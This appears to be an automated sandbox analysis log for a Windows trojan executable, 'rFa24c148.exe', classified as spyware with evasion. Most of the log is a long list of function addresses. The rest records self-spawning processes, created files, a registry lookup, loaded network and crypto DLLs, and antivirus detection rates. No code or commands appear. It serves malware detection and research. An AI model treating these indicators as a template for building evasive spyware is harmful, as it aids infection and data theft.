Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B322F 4_2_367B322F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0023 4_2_367B0023
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6621 4_2_367B6621
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF120 4_2_367BF120
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BD927 4_2_367BD927
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5219 4_2_367B5219
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8319 4_2_367B8319
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2918 4_2_367B2918
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BC618 4_2_367BC618
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BAE1F 4_2_367BAE1F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF111 4_2_367BF111
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1710 4_2_367B1710
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9B10 4_2_367B9B10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6609 4_2_367B6609
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4908 4_2_367B4908
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7008 4_2_367B7008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BC608 4_2_367BC608
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BDE00 4_2_367BDE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2907 4_2_367B2907
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6FFB 4_2_367B6FFB
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1FF8 4_2_367B1FF8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB2F8 4_2_367BB2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B16FF 4_2_367B16FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9AFF 4_2_367B9AFF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0DF0 4_2_367B0DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B87F0 4_2_367B87F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BDDF0 4_2_367BDDF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B48F7 4_2_367B48F7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF5E8 4_2_367BF5E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1FE8 4_2_367B1FE8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB2E8 4_2_367BB2E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCAE0 4_2_367BCAE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0DE0 4_2_367B0DE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B87E0 4_2_367B87E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5FD8 4_2_367B5FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9FD8 4_2_367B9FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B3FD8 4_2_367B3FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCAD1 4_2_367BCAD1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B04D0 4_2_367B04D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B74D0 4_2_367B74D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF5D7 4_2_367BF5D7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE2C8 4_2_367BE2C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9FC8 4_2_367B9FC8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB7C0 4_2_367BB7C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B04C0 4_2_367B04C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5FC7 4_2_367B5FC7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B56B8 4_2_367B56B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8CB8 4_2_367B8CB8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE2B8 4_2_367BE2B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B74BF 4_2_367B74BF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BFAB0 4_2_367BFAB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8CA9 4_2_367B8CA9
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2DA8 4_2_367B2DA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCFA8 4_2_367BCFA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B56A8 4_2_367B56A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB7AF 4_2_367BB7AF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1BA0 4_2_367B1BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BA4A0 4_2_367BA4A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BFAA0 4_2_367BFAA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCFA7 4_2_367BCFA7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2D9B 4_2_367B2D9B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4D98 4_2_367B4D98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7998 4_2_367B7998
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1B91 4_2_367B1B91
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE790 4_2_367BE790
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4D89 4_2_367B4D89
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2488 4_2_367B2488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BBC88 4_2_367BBC88
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7988 4_2_367B7988
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BA48F 4_2_367BA48F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1280 4_2_367B1280
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9180 4_2_367B9180
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EEE48 4_2_367EEE48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E70C0 4_2_367E70C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED710 4_2_367ED710
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6A70 4_2_367E6A70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ECC68 4_2_367ECC68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4E60 4_2_367E4E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1C60 4_2_367E1C60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E9C53 4_2_367E9C53
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC249 4_2_367EC249
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6440 4_2_367E6440
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3240 4_2_367E3240
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0040 4_2_367E0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EEE3B 4_2_367EEE3B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0037 4_2_367E0037
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6430 4_2_367E6430
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB829 4_2_367EB829
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4820 4_2_367E4820
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1620 4_2_367E1620
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E8810 4_2_367E8810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EAE09 4_2_367EAE09
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5E00 4_2_367E5E00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E2C00 4_2_367E2C00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED401 4_2_367ED401
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EA8F8 4_2_367EA8F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ECEF0 4_2_367ECEF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5AE0 4_2_367E5AE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E28E0 4_2_367E28E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E9EDB 4_2_367E9EDB
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC4D0 4_2_367EC4D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5AD1 4_2_367E5AD1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3EC0 4_2_367E3EC0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0CC0 4_2_367E0CC0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E94BB 4_2_367E94BB
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EBAB0 4_2_367EBAB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E70AF 4_2_367E70AF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E54A0 4_2_367E54A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E22A0 4_2_367E22A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB090 4_2_367EB090
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3880 4_2_367E3880
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0680 4_2_367E0680
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6A80 4_2_367E6A80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED179 4_2_367ED179
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6760 4_2_367E6760
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3560 4_2_367E3560
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0360 4_2_367E0360
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC759 4_2_367EC759
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0350 4_2_367E0350
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6750 4_2_367E6750
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4B40 4_2_367E4B40
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1940 4_2_367E1940
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EBD38 4_2_367EBD38
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6120 4_2_367E6120
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E2F20 4_2_367E2F20
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB318 4_2_367EB318
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4500 4_2_367E4500
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1300 4_2_367E1300
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED700 4_2_367ED700
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5DF0 4_2_367E5DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E7DF0 4_2_367E7DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E41E0 4_2_367E41E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0FE0 4_2_367E0FE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC9E1 4_2_367EC9E1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0FD0 4_2_367E0FD0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E41D0 4_2_367E41D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E73D0 4_2_367E73D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E99C8 4_2_367E99C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E57C0 4_2_367E57C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E25C0 4_2_367E25C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EBFC1 4_2_367EBFC1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6DA0 4_2_367E6DA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3BA0 4_2_367E3BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E09A0 4_2_367E09A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB5A1 4_2_367EB5A1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5180 4_2_367E5180
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1F80 4_2_367E1F80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EAB80 4_2_367EAB80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8470 4_2_367F8470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1CF0 4_2_367F1CF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FFB30 4_2_367FFB30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE870 4_2_367FE870
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB670 4_2_367FB670
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE861 4_2_367FE861
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9A50 4_2_367F9A50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FCC50 4_2_367FCC50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FCC41 4_2_367FCC41
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0040 4_2_367F0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB030 4_2_367FB030
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE230 4_2_367FE230
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1828 4_2_367F1828
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE221 4_2_367FE221
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1817 4_2_367F1817
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0013 4_2_367F0013
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FC610 4_2_367FC610
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9410 4_2_367F9410
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FF810 4_2_367FF810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9400 4_2_367F9400
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F04FF 4_2_367F04FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FF4F0 4_2_367FF4F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F90F0 4_2_367F90F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FC2F0 4_2_367FC2F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1CE0 4_2_367F1CE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FD8D0 4_2_367FD8D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA6D0 4_2_367FA6D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FBCB0 4_2_367FBCB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8AB0 4_2_367F8AB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FEEB0 4_2_367FEEB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8A9F 4_2_367F8A9F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0E98 4_2_367F0E98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA090 4_2_367FA090
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FD290 4_2_367FD290
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0E8D 4_2_367F0E8D
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9D70 4_2_367F9D70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FCF70 4_2_367FCF70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1360 4_2_367F1360
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1351 4_2_367F1351
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE550 4_2_367FE550
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB350 4_2_367FB350
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FC930 4_2_367FC930
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9730 4_2_367F9730
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FAD10 4_2_367FAD10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FDF10 4_2_367FDF10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0508 4_2_367F0508
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FDBF0 4_2_367FDBF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA9F0 4_2_367FA9F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F35E8 4_2_367F35E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FF1D0 4_2_367FF1D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F09D0 4_2_367F09D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8DD0 4_2_367F8DD0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FBFD0 4_2_367FBFD0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F09BF 4_2_367F09BF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FD5B0 4_2_367FD5B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA3B0 4_2_367FA3B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB990 4_2_367FB990
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8790 4_2_367F8790
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FEB90 4_2_367FEB90
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_368336F0 4_2_368336F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831470 4_2_36831470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36833008 4_2_36833008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831B50 4_2_36831B50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832238 4_2_36832238
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830D88 4_2_36830D88
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832920 4_2_36832920
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_368336E1 4_2_368336E1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831460 4_2_36831460
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36833003 4_2_36833003
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831B3F 4_2_36831B3F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832229 4_2_36832229
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830015 4_2_36830015
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830040 4_2_36830040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830D7B 4_2_36830D7B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830A10 4_2_36830A10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_368308DE 4_2_368308DE
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832911 4_2_36832911
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830960 4_2_36830960
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36922788 4_2_36922788
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36922770 4_2_36922770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36929771 4_2_36929771
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36920F74 4_2_36920F74
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: String function: 00402B3A appears 51 times
Source: rFa24c148.exe, 00000004.00000002.2993451068.0000000033237000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rFa24c148.exe
Source: rFa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00404457 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404457
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Program Files (x86)\shaw
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack
Source: C:\Users\user\Desktop\rFa24c148.exe Mutant created: NULL
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nsgA16E.tmp
Source: rFa24c148.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\rFa24c148.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\rFa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rFa24c148.exe ReversingLabs: Detection: 15%
Source: rFa24c148.exe Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\rFa24c148.exe File read: C:\Users\user\Desktop\rFa24c148.exe
Source: unknown Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
Source: C:\Users\user\Desktop\rFa24c148.exe Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
Source: C:\Users\user\Desktop\rFa24c148.exe Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: secur32.dll
